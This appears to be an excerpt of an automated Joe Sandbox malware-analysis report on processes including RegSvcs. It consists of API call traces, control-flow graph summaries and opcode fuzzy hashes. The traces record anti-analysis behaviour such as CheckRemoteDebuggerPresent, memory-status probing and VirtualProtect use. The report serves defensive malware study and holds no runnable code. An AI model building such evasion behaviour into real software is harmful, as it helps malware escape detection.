                                                • Source File: 0000000B.00000002.1561797053.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_76c0000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: a4e03ce4c535c51bd3810cdf9658aa3016ad2a40e1e4d8ae357a86cd94b3ffe2
                                                • Instruction ID: f0b907def3f57fc7ae628c673fb22dfa2022cb5bf3b0b4f4325cc50a64fd103e
                                                • Opcode Fuzzy Hash: a4e03ce4c535c51bd3810cdf9658aa3016ad2a40e1e4d8ae357a86cd94b3ffe2
                                                • Instruction Fuzzy Hash: C921F4B5D002499FCB10CF9AC484BEEFBF4FB48310F10842AE959A7250D379A545CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 446 76c7cc0-76c7d40 VirtualProtect 448 76c7d49-76c7d6a 446->448 449 76c7d42-76c7d48 446->449 449->448
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076C7D33
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1561797053.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_76c0000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: e973e006af94f7eea8754f88fd19d568daaf046daf194d0a523dc18750c81c79
                                                • Instruction ID: be4cf4ddb29224477cd97ce453dac01de0acb18478c6c7c987c5e9dcf2315814
                                                • Opcode Fuzzy Hash: e973e006af94f7eea8754f88fd19d568daaf046daf194d0a523dc18750c81c79
                                                • Instruction Fuzzy Hash: 9321D3B59002499FDB10CFAAC484BEEFBF4FB48320F108429E959A7250D378A945CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 451 169b038-169b078 452 169b07a-169b07d 451->452 453 169b080-169b0ab GetModuleHandleW 451->453 452->453 454 169b0ad-169b0b3 453->454 455 169b0b4-169b0c8 453->455 454->455
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0169B09E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 60d6d08f4b29452bd484468557642a7c378806b64b1faf23c388fa99d9e4109e
                                                • Instruction ID: dfd907f439d772d35adb11d8fef0057374abebd1f2cbde90fa6257ba97050dc7
                                                • Opcode Fuzzy Hash: 60d6d08f4b29452bd484468557642a7c378806b64b1faf23c388fa99d9e4109e
                                                • Instruction Fuzzy Hash: FB11E3B5C002498FDB20CF9AD844BDEFBF8EB88714F10851AD969A7210D379A545CFA1

                                                Execution Graph

                                                Execution Coverage:10.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:144
                                                Total number of Limit Nodes:15
                                                execution_graph 41832 6b2e290 41833 6b2e2f8 CreateWindowExW 41832->41833 41835 6b2e3b4 41833->41835 41835->41835 41858 6b23ae0 DuplicateHandle 41859 6b23b76 41858->41859 41860 1270a35 41861 12709f5 41860->41861 41863 127084e 41860->41863 41862 127091b 41863->41862 41867 1271380 41863->41867 41871 6b22780 41863->41871 41875 6b22790 41863->41875 41868 127134d 41867->41868 41869 1271383 41867->41869 41868->41863 41869->41868 41879 1278c88 41869->41879 41872 6b2279f 41871->41872 41892 6b21f7c 41872->41892 41876 6b2279f 41875->41876 41877 6b21f7c GetModuleHandleW 41876->41877 41878 6b227c0 41877->41878 41878->41863 41880 1278c92 41879->41880 41881 1278cac 41880->41881 41884 6b4f638 41880->41884 41888 6b4f628 41880->41888 41881->41869 41886 6b4f64d 41884->41886 41885 6b4f862 41885->41881 41886->41885 41887 6b4fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 41886->41887 41887->41886 41890 6b4f64d 41888->41890 41889 6b4f862 41889->41881 41890->41889 41891 6b4fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 41890->41891 41891->41890 41893 6b21f87 41892->41893 41896 6b236dc 41893->41896 41895 6b24146 41895->41895 41897 6b236e7 41896->41897 41898 6b2486c 41897->41898 41900 6b264e8 41897->41900 41898->41895 41901 6b26509 41900->41901 41902 6b2652d 41901->41902 41904 6b26698 41901->41904 41902->41898 41906 6b266a5 41904->41906 41905 6b266de 41905->41902 41906->41905 41908 6b25404 41906->41908 41909 6b2540f 41908->41909 41911 6b26750 41909->41911 41912 6b25438 41909->41912 41913 6b25443 41912->41913 41919 6b25448 41913->41919 41915 6b267bf 41923 6b2b9c8 41915->41923 41928 6b2b9e0 41915->41928 41916 6b267f9 41916->41911 41922 6b25453 41919->41922 41920 6b27960 41920->41915 41921 6b264e8 GetModuleHandleW 41921->41920 41922->41920 41922->41921 41925 6b2b9e0 41923->41925 41924 6b2ba1d 41924->41916 41925->41924 41934 6b2bc58 41925->41934 41937 6b2bc48 41925->41937 41930 6b2ba11 41928->41930 41931 6b2ba5d 41928->41931 41929 6b2ba1d 
41929->41916 41930->41929 41932 6b2bc58 GetModuleHandleW 41930->41932 41933 6b2bc48 GetModuleHandleW 41930->41933 41931->41916 41932->41931 41933->41931 41941 6b2bc98 41934->41941 41935 6b2bc62 41935->41924 41938 6b2bc58 41937->41938 41940 6b2bc98 GetModuleHandleW 41938->41940 41939 6b2bc62 41939->41924 41940->41939 41943 6b2bc9d 41941->41943 41942 6b2bcdc 41942->41935 41943->41942 41944 6b2bee0 GetModuleHandleW 41943->41944 41945 6b2bf0d 41944->41945 41945->41935 41946 122d030 41947 122d048 41946->41947 41948 122d0a2 41947->41948 41953 6b2e448 41947->41953 41957 6b2f198 41947->41957 41963 6b2d6c4 41947->41963 41969 6b2e437 41947->41969 41954 6b2e46e 41953->41954 41955 6b2d6c4 2 API calls 41954->41955 41956 6b2e48f 41955->41956 41956->41948 41958 6b2f1d5 41957->41958 41959 6b2f207 41958->41959 41973 6b2f330 41958->41973 41978 6b2f3fc 41958->41978 41984 6b2f320 41958->41984 41964 6b2d6cf 41963->41964 41965 6b2f207 41964->41965 41966 6b2f330 2 API calls 41964->41966 41967 6b2f320 2 API calls 41964->41967 41968 6b2f3fc 2 API calls 41964->41968 41966->41965 41967->41965 41968->41965 41970 6b2e448 41969->41970 41971 6b2d6c4 2 API calls 41970->41971 41972 6b2e48f 41971->41972 41972->41948 41974 6b2f344 41973->41974 41989 6b2f3e8 41974->41989 41992 6b2f3d8 41974->41992 41975 6b2f3d0 41975->41959 41979 6b2f3ba 41978->41979 41980 6b2f40a 41978->41980 41982 6b2f3e8 2 API calls 41979->41982 41983 6b2f3d8 2 API calls 41979->41983 41981 6b2f3d0 41981->41959 41982->41981 41983->41981 41986 6b2f330 41984->41986 41985 6b2f3d0 41985->41959 41987 6b2f3e8 2 API calls 41986->41987 41988 6b2f3d8 2 API calls 41986->41988 41987->41985 41988->41985 41990 6b2f3f9 41989->41990 41996 6f70c40 41989->41996 41990->41975 41993 6b2f3e8 41992->41993 41994 6b2f3f9 41993->41994 41995 6f70c40 2 API calls 41993->41995 41994->41975 41995->41994 42000 6f70c62 41996->42000 42004 6f70c70 41996->42004 41997 6f70c5a 41997->41990 42001 6f70c70 42000->42001 42002 6f70d0a CallWindowProcW 42001->42002 42003 
6f70cb9 42001->42003 42002->42003 42003->41997 42005 6f70cb2 42004->42005 42007 6f70cb9 42004->42007 42006 6f70d0a CallWindowProcW 42005->42006 42005->42007 42006->42007 42007->41997 42008 1277ed0 42009 1277f14 CheckRemoteDebuggerPresent 42008->42009 42010 1277f56 42009->42010 41836 6b23898 41837 6b238de GetCurrentProcess 41836->41837 41839 6b23930 GetCurrentThread 41837->41839 41840 6b23929 41837->41840 41841 6b23966 41839->41841 41842 6b2396d GetCurrentProcess 41839->41842 41840->41839 41841->41842 41845 6b239a3 41842->41845 41843 6b239cb GetCurrentThreadId 41844 6b239fc 41843->41844 41845->41843 41846 6f72e38 41847 6f72e60 41846->41847 41850 6f72e8c 41846->41850 41848 6f72e69 41847->41848 41851 6f722c4 41847->41851 41852 6f722cf 41851->41852 41853 6f73183 41852->41853 41855 6f722e0 41852->41855 41853->41850 41856 6f731b8 OleInitialize 41855->41856 41857 6f7321c 41856->41857 41857->41853

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b458e7, blocks extend to 6b45dd2, one internal call to 6b44728; no API calls annotated.]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XPq$\Oq
                                                • API String ID: 0-3725437444
                                                • Opcode ID: ae183fb586117121c03ba09459a8c68f10413348002f34bd174585d14d212e53
                                                • Instruction ID: 87ff20747e5de7473dc77792532ee1a9c7e85dc295f98bcaa8461d98d38b3d7e
                                                • Opcode Fuzzy Hash: ae183fb586117121c03ba09459a8c68f10413348002f34bd174585d14d212e53
                                                • Instruction Fuzzy Hash: 15D12A72B105148FDF64EB68D484AADBBF2FF89320F2484AAD44ADB351CA35DC45CB91
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ae5adcc32df85dfe414d68052c47abbfa66fea0bd136370e248e8f6699b89b2
                                                • Instruction ID: 653a22c263c8c58ea5478b6d9f3b96c1173ec94333de976c642a04e1f1051de6
                                                • Opcode Fuzzy Hash: 1ae5adcc32df85dfe414d68052c47abbfa66fea0bd136370e248e8f6699b89b2
                                                • Instruction Fuzzy Hash: A2924874A002048FDB64EB68C584BADBBF2FF45314F5485A9E4099B362DB35ED85EF80
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dae762c2c5d1900b1baaba1e6f09084df7840c8c9dcbab6a0e223dd6962cb870
                                                • Instruction ID: f425bf9a7e31081ba2750c0fc06417279afe559d6d432d80f47879f5ee5d594a
                                                • Opcode Fuzzy Hash: dae762c2c5d1900b1baaba1e6f09084df7840c8c9dcbab6a0e223dd6962cb870
                                                • Instruction Fuzzy Hash: 83629C70A002089FDB64EB68D594BADB7F2FF89310F1484A9E406DB395EB35ED45DB80
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e855911b24ae4ab52af09992abcc849b71290fea2ea2cac719afdc8ba4cd0525
                                                • Instruction ID: f73ba67e1d0402963e28d7de5114d071d148d1b5ccbde39c49ef01d137c153ca
                                                • Opcode Fuzzy Hash: e855911b24ae4ab52af09992abcc849b71290fea2ea2cac719afdc8ba4cd0525
                                                • Instruction Fuzzy Hash: 0232CE74B112089FDB54EF68D890BAEBBB2FB88710F108569D406EB355DB35EC42CB90
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21764afe23d37c47212a8143c2d3b9ed2f1f4e1534d5e271bbeb7c3ec4b3f5cb
                                                • Instruction ID: 4c6f1e968183dcf5e94de0e84588f422981dca4700cfc6fb4d786ce674d3aea6
                                                • Opcode Fuzzy Hash: 21764afe23d37c47212a8143c2d3b9ed2f1f4e1534d5e271bbeb7c3ec4b3f5cb
                                                • Instruction Fuzzy Hash: DC12B3B2E006189FDF70EB64D8807AEBBB2FF85310F2484A9D5569B345DA34DC46DB90
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c7b8e2c1407f1a0af48f7e40fde57c82fe69c7a78bddbcdf3bc7223a8458647
                                                • Instruction ID: 5a5513a6b8615711164600b3be9536935f0e1f3a59f426232bbb028461144bd1
                                                • Opcode Fuzzy Hash: 4c7b8e2c1407f1a0af48f7e40fde57c82fe69c7a78bddbcdf3bc7223a8458647
                                                • Instruction Fuzzy Hash: C522A2B0E102098FEF64EF68C4907ADB7B2FB49310F2099A6E545EB395DA34DC81DB51
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db53f5cc457c7f06d345269beeb422b13c1f74985d9fcaf73d4c7e05a16bdccd
                                                • Instruction ID: f1adbb7a2000ee9bcc88f82bdb1149ea2f6fe513b5fbd4d90201cb274310bfb6
                                                • Opcode Fuzzy Hash: db53f5cc457c7f06d345269beeb422b13c1f74985d9fcaf73d4c7e05a16bdccd
                                                • Instruction Fuzzy Hash: 6B321E31E1061ACFDB14EF79C85469DB7B2FFC9300F1496AAD44AA7254EB70A985CF80
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0cc9eb5b59c49d042c1728f163bb430710a8b0c028c9ffb4ca43c679e97671d
                                                • Instruction ID: e96c869db4dc19befc107c989902498e85a141140c14a596c8c0ec92c8fb2833
                                                • Opcode Fuzzy Hash: b0cc9eb5b59c49d042c1728f163bb430710a8b0c028c9ffb4ca43c679e97671d
                                                • Instruction Fuzzy Hash: 65028B70B102199FDB54EB68D494BAEB7F6FF84310F248569D4069B396DB35EC42CB80

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06B23916
                                                • GetCurrentThread.KERNEL32 ref: 06B23953
                                                • GetCurrentProcess.KERNEL32 ref: 06B23990
                                                • GetCurrentThreadId.KERNEL32 ref: 06B239E9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e75fa386a01a33ce7979924e0e2795b3556e8eb28f1147a7810a23b74196f7ae
                                                • Instruction ID: 2f2eda72d6dc4bb97a64db34670c7c9656746f292504aeffe3e94190b962fe7f
                                                • Opcode Fuzzy Hash: e75fa386a01a33ce7979924e0e2795b3556e8eb28f1147a7810a23b74196f7ae
                                                • Instruction Fuzzy Hash: F85167B0E013498FDB54CFA9D848BDEBBF1EF89310F208059E059A7360DB799945CB66

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06B23916
                                                • GetCurrentThread.KERNEL32 ref: 06B23953
                                                • GetCurrentProcess.KERNEL32 ref: 06B23990
                                                • GetCurrentThreadId.KERNEL32 ref: 06B239E9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 314bb429f8a7277fa5055ed07e7ebc2032d3ab751623323901cccc2b919fef4e
                                                • Instruction ID: e51723106bd40249aa61765719ba739fc40a2230bc1d51151de67af971a569e9
                                                • Opcode Fuzzy Hash: 314bb429f8a7277fa5055ed07e7ebc2032d3ab751623323901cccc2b919fef4e
                                                • Instruction Fuzzy Hash: DC5168B09003498FDB54CFA9D448BDEBBF1EF89310F208059E059A7360D7789945CF65

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b447b0, blocks extend to 6b44efb, one internal call to 6b4505a; no API calls annotated.]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq$\Oq
                                                • API String ID: 0-132346853
                                                • Opcode ID: 722b7ad44a180909572f91036804728d27904d6b73b4f02d2d824bba5d592992
                                                • Instruction ID: 7ab7a2287f0ac8ded838bf205e0c6b9e069e57e2bbf22f8a5336ee5ccc9cdd6d
                                                • Opcode Fuzzy Hash: 722b7ad44a180909572f91036804728d27904d6b73b4f02d2d824bba5d592992
                                                • Instruction Fuzzy Hash: F2619E70E102199FEF54EFA9C8547AEBBF6FF88310F208469D106AB395DB758C458B90

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b447a1, blocks extend to 6b44efb, one internal call to 6b4505a; no API calls annotated.]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq
                                                • API String ID: 0-3167736908
                                                • Opcode ID: 1a34a93a46c981d98567811640ddc8633aa1583ddea822ea201596764abf7524
                                                • Instruction ID: fbcc1142109c7d7fe2f65c796992a347a2ea965af0688447ffe7685b963f8787
                                                • Opcode Fuzzy Hash: 1a34a93a46c981d98567811640ddc8633aa1583ddea822ea201596764abf7524
                                                • Instruction Fuzzy Hash: A7516F70E102189FDB55EFA9C854BAEBBF7FF88310F208529D106AB395DB758C058B90

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b2bc98, blocks extend to 6b2bf28; internal calls to 6b2abfc, 6b2bf32 / 6b2bf40, 6b2ac08, 6b2444c, 6b2aa78 and 6b2ac18; GetModuleHandleW is called from block 6b2bee0-6b2bf0b.]
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06B2BEFE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b7bb67e623b0d94d1729de06835ddeadec6164546eb3aded621a383dde634caf
                                                • Instruction ID: 9a49e2d793cd5060e77aa75a1f0838f1305037607e1f8a527399fade3e3a1a2a
                                                • Opcode Fuzzy Hash: b7bb67e623b0d94d1729de06835ddeadec6164546eb3aded621a383dde634caf
                                                • Instruction Fuzzy Hash: EA8167B0A00B168FD7A4DF29D44079ABBF1FF88204F008A6DD49AD7A50DB75E846CF91

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b2e284, blocks extend to 6b2e401 (which loops on itself); CreateWindowExW is called from block 6b2e353-6b2e3b2.]
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2E3A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c27fa6aba8541c31ee077bb336869095917820e8b8e1540987976486df40a6e9
                                                • Instruction ID: 00778f1d46859d2e79ed2b50cd0fb8f7687aa37367959fbd366f82419e012149
                                                • Opcode Fuzzy Hash: c27fa6aba8541c31ee077bb336869095917820e8b8e1540987976486df40a6e9
                                                • Instruction Fuzzy Hash: B251D4B5D003599FDB24CF9AC884ADEBBF5FF48310F64812AE819AB210D7749845CF91

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6b2e290, blocks extend to 6b2e401 (which loops on itself); CreateWindowExW is called from block 6b2e313-6b2e3b2.]
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2E3A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 11e6e58d9781a6eecfe9083808a20d597cc4c02245ae7f986920e0cc10a37bc3
                                                • Instruction ID: a0726c2b35bc7da1f4269492188182e8ceb8e1ab21a74588538303529d19a6a3
                                                • Opcode Fuzzy Hash: 11e6e58d9781a6eecfe9083808a20d597cc4c02245ae7f986920e0cc10a37bc3
                                                • Instruction Fuzzy Hash: 9C41C1B1D003599FDB25CF9AC884ADEBBF5FF48310F24812AE818AB210D775A845CF91

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 6f70c70, blocks extend to 6f70d8c; CallWindowProcW is called from block 6f70d0a-6f70d42.]
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F70D31
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860857393.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 7a5cc200fa1a329819ac8cf91150715e54f9cebcf84e6820f5316428b283423c
                                                • Instruction ID: 43f09549269907fc30fe4652e9902eb27a634a0d40820b78f3c43e8bd2ad1e42
                                                • Opcode Fuzzy Hash: 7a5cc200fa1a329819ac8cf91150715e54f9cebcf84e6820f5316428b283423c
                                                • Instruction Fuzzy Hash: CB41E6B5D00309CFDB54CF99C488AAABBF5FF88314F248459D519AB321D775A841CFA4

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 127f3a4, blocks extend to 127f485; GlobalMemoryStatusEx is called from block 127f3c7-127f454.]
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0127F447
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 08974382a42924f61305f5a356ffacc6fbfb3e705fe2d6d342d95060aa758725
                                                • Instruction ID: c89fa822046642d3eed8009d613328a839ed954502af061a708f7f99b9941d7b
                                                • Opcode Fuzzy Hash: 08974382a42924f61305f5a356ffacc6fbfb3e705fe2d6d342d95060aa758725
                                                • Instruction Fuzzy Hash: A221A971D042598FDB10DFAAD804BEEBBF4EF48210F10856AD918B7240D7789841CFA1

                                                Control-flow Graph

                                                [Basic-block graph omitted (graph-image residue); legend: Executed / Not Executed. Function starts at 1277ecb, blocks extend to 1277f98; CheckRemoteDebuggerPresent is called from block 1277ecb-1277f54.]
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01277F47
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06B23B67
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0127F447
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06B2BEFE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06F7320D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860857393.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Oq
                                                • API String ID: 0-643489707
                                                • Instruction Fuzzy Hash: 3041D070E003099FDB65EFA5D494AAEBBB2FF85340F104569E406EB340EB70D946DB92
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2bf5fd4ca4d7e0eef215723e34974f7b8ed54404a835bcdc156dd95283ef557
                                                • Instruction ID: fa0fbebc54c4f8f555c76f52622a8837a70a2a0702991e596aeea45e5711128d
                                                • Opcode Fuzzy Hash: d2bf5fd4ca4d7e0eef215723e34974f7b8ed54404a835bcdc156dd95283ef557
                                                • Instruction Fuzzy Hash: EA31C170B102098FDB69AB74D41476E7BE3FB89210F2045A8E402DB399EF35CE45EB95
                                                Memory Dump Source
